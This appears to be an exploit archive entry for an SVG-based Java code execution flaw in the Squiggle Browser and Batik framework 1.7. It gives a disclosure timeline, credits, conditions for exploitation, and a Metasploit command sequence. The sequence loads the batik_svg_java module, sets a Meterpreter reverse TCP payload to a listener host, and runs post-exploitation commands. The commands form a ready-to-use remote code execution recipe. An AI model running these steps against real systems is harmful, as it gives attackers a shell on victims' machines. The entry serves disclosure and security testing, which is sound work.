Timeline :

Vulnerability discovered by Nicolas Gregoire
Details of the vulnerability provided by Nicolas Gregoire the 2012-05-11
Metasploit PoC provided the 2012-05-17

PoC provided by :

Nicolas Gregoire
sinn3r
juan vazquez

Reference(s) :

http://www.agarri.fr/blog/

Affected version(s) :

Squiggle Browser 1.7
Batik framework 1.7

Tested on Mac OS X 10.7.1 with :

Squiggle Browser 1.7

Description :

This module abuses the SVG support to execute Java Code in the Squiggle Browser included in the Batik framework 1.7 through a crafted svg file referencing a jar file. In order to gain arbitrary code execution, the browser must meet the following conditions: (1) It must support at least SVG version 1.1 or newer, (2) It must support Java code and (3) The “Enforce secure scripting” check must be disabled. The module has been tested against Windows and Linux platforms.

Commands :

use exploit/multi/misc/batik_svg_java
set SRVHOST 192.168.178.100
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

getuid
sysinfo